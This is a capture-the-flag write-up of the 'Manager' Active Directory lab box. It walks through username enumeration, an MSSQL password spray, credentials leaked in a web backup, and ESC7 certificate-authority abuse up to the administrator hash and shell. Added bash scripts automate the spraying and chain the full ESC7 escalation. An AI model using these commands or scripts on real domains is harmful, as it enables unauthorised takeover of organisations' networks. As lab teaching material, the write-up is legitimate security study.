Manager was a medium-difficulty Active Directory box. The IIS site on port 80 is static and only matters as the place a backup archive is later fetched from. The foothold starts with enumerating domain usernames without credentials (RID cycling over SMB and Kerberos user enumeration), then spraying each username as its own password against MSSQL, which logs in as operator. From MSSQL, xp_dirtree lists the IIS webroot and reveals a backup archive containing raven's credentials, good for a WinRM shell. Privilege escalation abuses ESC7: raven holds the ManageCA right on the AD CS certificate authority, which is enough to obtain a certificate for administrator.
Enumeration
Nmap showed 12 open ports:
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-07 18:57:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
Port 80 served a static site with nothing to interact with, and directory brute-forcing turned up nothing useful.
Being an AD box, I went through the usual unauthenticated SMB, LDAP and RPC enumeration with impacket scripts; without a username and password none of it returned anything useful.
Bruteforcing
Bruteforcing can be done in two ways: RID cycling over SMB and username enumeration over Kerberos. Crackmapexec and kerbrute are the tools for the two respectively. Crackmapexec is no longer maintained; its successor is netexec, which keeps the same syntax.
A relative identifier (RID) is the last 32-bit sub-authority of an object's Security Identifier (SID). Every object in a domain shares the domain SID, so the RID is what uniquely identifies an account or group within it. Because RIDs are allocated sequentially, asking the DC to resolve DOMAIN-SID-500, -501, -502, ... back to names (an LSA LookupSids call) reveals every account name without credentials, as long as the DC accepts a null or guest SMB session.
RID Bruteforcing using crackmapexec
$ crackmapexec smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000
RID Bruteforcing using netexec
$ netexec smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000
Note: the username can be any value, including one that does not exist; this DC maps the unknown user to a guest/null session, which is enough for the SID lookups. A hardened DC that rejects anonymous SMB sessions returns nothing here. The number 10000 is the highest RID to try.
Crackmapexec Results
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
Username Bruteforcing using kerbrute
$ kerbrute userenum -d manager.htb /usr/share/wordlist/xato-net-10-million-usernames.txt --dc dc01.manager.htb
Results
[+] VALID USERNAME: ryan@manager.htb
[+] VALID USERNAME: guest@manager.htb
[+] VALID USERNAME: cheng@manager.htb
[+] VALID USERNAME: raven@manager.htb
[+] VALID USERNAME: administrator@manager.htb
[+] VALID USERNAME: Ryan@manager.htb
[+] VALID USERNAME: Raven@manager.htb
[+] VALID USERNAME: operator@manager.htb
Because kerbrute walks a 10-million-entry wordlist it took around 10 minutes, while the RID cycle with crackmapexec finished within 2 minutes. The results also differ: kerbrute can only confirm names that appear in the wordlist, and it missed Zhong, JinWoo and ChinHae, which the RID cycle listed. It is advised to use multiple tools for the same task against an AD environment.
Accessing MSSQL
Use the user list from the RID cycle to password-spray the MSSQL service. Without any known password, try each username as its own password: with --no-bruteforce crackmapexec pairs line N of the user file with line N of the password file instead of trying every combination, so passing the same file as both -u and -p tests exactly user:user, one attempt per account. The command below identified operator as a valid login with operator as the password.
MSSQL Password Spraying
$ crackmapexec mssql 10.10.11.236 -u users.txt -p users.txt --no-bruteforce
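The glue between the RID cycle and the spray is worth seeing in code: the listing has to become a plain users.txt, and the --no-bruteforce pairing is easy to get wrong. The bash below is an added example, not part of the original writeup; the RID_SAMPLE excerpt is constructed in the crackmapexec/netexec output format (it also accepts the raw lines, which carry an "SMB <ip> 445 DC01" prefix), and the netexec invocation it prints is the one the writeup uses.

```bash
#!/usr/bin/env bash
# Added helper (not from the original writeup): turn --rid-brute output into a spray
# list and show what "-u users.txt -p users.txt --no-bruteforce" actually tries.

# Constructed excerpt in the crackmapexec/netexec --rid-brute output format.
RID_SAMPLE='498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
1000: MANAGER\DC01$ (SidTypeUser)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)'

# Keep SidTypeUser rows only, drop machine accounts (name ends in $),
# strip the DOMAIN\ prefix and lowercase the name.
rid_users() {
  printf '%s\n' "$1" \
    | grep 'SidTypeUser' \
    | grep -v '\$ (SidTypeUser)' \
    | sed -E 's/.*: [^\\]+\\([^ ]+) \(SidTypeUser\).*/\1/' \
    | tr '[:upper:]' '[:lower:]'
}

# --no-bruteforce pairs line N of -u with line N of -p, so feeding the same file
# to both tries exactly user:user (one attempt per account, lockout-friendly).
user_as_pass_pairs() {
  printf '%s\n' "$1" | awk 'NF { print $1 ":" $1 }'
}

# Without --no-bruteforce the tool tries the full cross product: N*N attempts,
# which is what trips account lockout policies.
cross_product_count() {
  n=$(printf '%s\n' "$1" | grep -c .)
  echo $((n * n))
}

if [ "${1:-}" = "write" ]; then
  rid_users "$RID_SAMPLE" > users.txt
  echo "users.txt written ($(grep -c . users.txt) accounts); spray with:"
  echo "  netexec mssql 10.10.11.236 -u users.txt -p users.txt --no-bruteforce"
fi
```

Run it with `write` to produce users.txt; the pairs function is only there to make the line-wise semantics of --no-bruteforce explicit before you point the tool at a real domain with a lockout threshold.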
Accessing MSSQL
Use the same credentials with impacket's mssqlclient.py to reach the MSSQL service (-windows-auth, because operator is a domain account). Note the prompt: the login is mapped to guest in the master database, so it has almost no rights inside SQL Server. I could not find any useful data in the databases, nor crack the NetNTLMv2 hash. Enumerating the IIS webroot with xp_dirtree, however, turned up a backup file.
$ mssqlclient.py manager.htb/operator:operator@dc01.manager.htb -windows-auth
SQL (MANAGER\Operator guest@master)> EXEC xp_dirtree "C:\inetpub\wwwroot", 1,1
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
xp_dirtree is an extended stored procedure in SQL Server that returns a hierarchical listing of the folders (and optionally files) under a directory. It is executable by public, which is why a guest-mapped login can run it, and it runs with the rights of the SQL Server service account, not the SQL login. Syntax:
xp_dirtree 'directory_path' [, depth [, file]]
depth limits the recursion (0 = unlimited) and file = 1 includes files in the output; without the third argument only directories are listed, which is why the command above passes 1,1. Pointing it at a UNC path makes the service account authenticate outbound, which is the usual way to capture its NetNTLMv2 hash.
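With depth set to 0 (or anything above 1) xp_dirtree returns nested entries with only their depth, not their parent path, so turning a recursive listing into fetchable URLs takes a small parser. The bash below is an added example, not from the original writeup: DIRTREE_SAMPLE is a constructed listing in mssqlclient's output format, the file-extension filter is my choice, and the base URL http://manager.htb is assumed because the listed directory is the IIS webroot.

```bash
#!/usr/bin/env bash
# Added helper (not from the original writeup): rebuild full paths from xp_dirtree rows
# and turn files under the IIS webroot into URLs worth fetching.

# Constructed xp_dirtree listing as mssqlclient prints it (depth 0 = recurse fully,
# file = 1 lists files). Child rows follow their parent and carry only a depth number.
DIRTREE_SAMPLE='subdirectory depth file
------------------------------- ----- ----
about.html 1 1
css 1 0
style.css 2 1
images 1 0
logo.png 2 1
backup 1 0
old 2 0
site.zip 3 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1'

# Walk the rows in order, remember the most recent directory seen at each depth,
# and print every file with its reconstructed relative path. Names containing
# spaces would need a different split; that is a limitation of this parser.
dirtree_files() {
  printf '%s\n' "$1" | awk '
    NF == 3 && $2 ~ /^[0-9]+$/ {
      name = $1; depth = $2; isfile = $3
      prefix = ""
      for (i = 1; i < depth; i++) prefix = prefix dir[i] "/"
      if (isfile == 0) dir[depth] = name
      else print prefix name
    }'
}

# Files an attacker wants first: archives, backups, configs, dumps.
interesting_files() {
  dirtree_files "$1" | grep -Ei '\.(zip|7z|rar|tar|gz|bak|old|sql|config)$'
}

# Map webroot-relative paths to URLs on the IIS site (port 80 on this box).
webroot_urls() {
  base=${2:-http://manager.htb}
  interesting_files "$1" | sed "s|^|${base}/|"
}

if [ "${1:-}" = "fetch" ]; then
  # Only probes when asked. IIS refuses to serve web.config, so a 404 there is expected;
  # a 200 on an archive is the finding.
  webroot_urls "$DIRTREE_SAMPLE" | while read -r url; do
    printf '%s -> %s\n' "$url" "$(curl -s -o /dev/null -w '%{http_code}' "$url")"
  done
fi
```

Paste the real mssqlclient output into DIRTREE_SAMPLE (or pipe it into dirtree_files) after running `EXEC xp_dirtree 'C:\inetpub\wwwroot', 0, 1`; the depth-0 form is what makes the path reconstruction necessary.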
Exploiting
Shell as Raven
Download the backup file from http://manager.htb/website-backup-27-07-23-old.zip (the directory xp_dirtree listed is the IIS webroot, so anything in it is served over HTTP) and unzip it. The credentials for raven were in a hidden XML file inside the archive:
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
I grabbed a shell with evil-winrm to get the user.txt
$ evil-winrm -u raven -i manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Privilege Escalation
With a valid user and password there is far more to enumerate. Impacket's AS-REP roast and Kerberoast checks found no roastable accounts, so I moved on to the domain's AD CS configuration.
$ certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -target manager.htb -text -stdout -vulnerable
The same enumeration can be done from the target with Certify.exe. Certipy found no vulnerable certificate template, but it did flag the CA itself: raven holds the ManageCA right on manager-DC01-CA (ESC7).
[snip]
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
ESC7 is explained in the certipy GitHub repo:
The user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled. The Manage CA access right can fulfil these prerequisites.
The technique relies on the fact that users with the Manage CA and Manage Certificates access rights can issue failed certificate requests. The SubCA certificate template is vulnerable to ESC1, but only administrators can enrol in the template. Thus, a user can request to enrol in the SubCA - which will be denied - but then issued by the manager afterwards.
~ Certipy GitHub
Fetching certificates
Multiple steps were involved in escalating to the Administrator user.
- Grant raven the Manage Certificates access right by adding the user as a new officer; ManageCA is what allows this.
$ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
- Request a certificate from the SubCA template with the administrator UPN. The request is denied because only administrators may enrol in SubCA, but the CA still assigns a request ID and certipy offers to save the private key; keep both, the key is needed to assemble the PFX later.
$ certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enrol for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
- Issue the denied request with the ca command and the -issue-request <request ID> parameter; this succeeds because raven is now a certificate officer.
$ certipy ca -ca "manager-DC01-CA" -issue-request 13 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
- Retrieve the issued certificate with the req command and the -retrieve <request ID> parameter; certipy pairs it with the saved 13.key and writes administrator.pfx.
$ certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca "manager-DC01-CA" -target manager.htb -retrieve 13
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
Shell as Administrator
- Fetch the Administrator NT hash by authenticating with the certificate (PKINIT, then the NT hash via the U2U/PAC trick certipy auth performs).
$ sudo ntpdate -u manager.htb #Resolve clock skew
$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
Note: the first certipy auth attempt failed with Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great) because the attacking machine's clock was off from the DC; Kerberos tolerates at most 5 minutes of skew by default, hence the ntpdate sync first. Also note the line "Certificate has no object SID": after the KB5014754 certificate-mapping changes, a DC in Full Enforcement mode rejects PKINIT with a certificate that lacks the SID extension, so the TGT being issued shows this DC is still in compatibility mode.
- Login as Administrator.
$ evil-winrm -u administrator -i manager.htb -H ae5064c2f62317332c88629e025924ef #Shell as Administrator
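The escalation above is five certipy calls whose only moving part is the request ID printed in the middle of a failed command. The bash below chains them as one script; it is an added example, not the author's code, and assumes certipy 4.x on PATH, the CA and account names from this box, and that `certipy ca -list-templates` / `-enable-template` behave as documented in certipy's help. SAMPLE_OUTPUT is a constructed copy of the denial output for testing the parser; nothing touches the network unless ESC7_RUN=1 is set.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): the ESC7 SubCA dance as one script,
# with the request ID parsed from certipy's output and a precheck that SubCA is enabled.
set -u

CA='manager-DC01-CA'
DC='manager.htb'
DC_IP='10.10.11.236'
LOWPRIV='raven@manager.htb'
PASS='R4v3nBe5tD3veloP3r!123'
TARGET_UPN='administrator@manager.htb'

# certipy prints "[*] Request ID is N" even when the request is denied; pull N out.
request_id_from_output() {
  printf '%s\n' "$1" | sed -n -E 's/.*Request ID is ([0-9]+).*/\1/p' | head -n 1
}

# The denied-then-issued trick needs SubCA enabled on the CA. ManageCA lets raven
# enable it if an admin had disabled it (assumed certipy options: -list-templates,
# -enable-template).
subca_enabled() {
  certipy ca -ca "$CA" -target "$DC" -username "$LOWPRIV" -password "$PASS" -list-templates \
    | grep -qi 'SubCA'
}

esc7_subca_abuse() {
  subca_enabled || certipy ca -ca "$CA" -target "$DC" -username "$LOWPRIV" -password "$PASS" \
    -enable-template SubCA

  # 1. ManageCA -> grant ourselves ManageCertificates by becoming an officer.
  certipy ca -ca "$CA" -target "$DC" -username "$LOWPRIV" -password "$PASS" \
    -add-officer "${LOWPRIV%%@*}"

  # 2. Request SubCA with the admin UPN. Denied, but a request ID is assigned and the
  #    key is saved. Answer the save prompt with "y" and ignore the non-zero exit.
  out=$(printf 'y\n' | certipy req -username "$LOWPRIV" -password "$PASS" -ca "$CA" \
    -target "$DC" -template SubCA -upn "$TARGET_UPN" 2>&1 || true)
  id=$(request_id_from_output "$out")
  [ -n "$id" ] || { echo "no request ID in certipy output:"; echo "$out"; return 1; }

  # 3. As officer, issue the denied request. 4. Retrieve it; certipy pairs it with $id.key.
  certipy ca  -ca "$CA" -target "$DC" -username "$LOWPRIV" -password "$PASS" -issue-request "$id"
  certipy req -ca "$CA" -target "$DC" -username "$LOWPRIV" -password "$PASS" -retrieve "$id"

  # 5. PKINIT as administrator. Sync the clock first or the KDC answers KRB_AP_ERR_SKEW.
  sudo ntpdate -u "$DC"
  certipy auth -pfx "${TARGET_UPN%%@*}.pfx" -dc-ip "$DC_IP"
}

# Constructed copy of the denial output, used to exercise the parser offline.
SAMPLE_OUTPUT='[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate'

if [ "${ESC7_RUN:-0}" = 1 ]; then
  esc7_subca_abuse
fi
```

The parser is the part worth testing: certipy exits non-zero on the denial, so a script that checks exit codes instead of scraping the request ID stops at step 2. On a DC in Full Enforcement mode the final auth still fails because the certificate carries no SID, and no amount of scripting changes that.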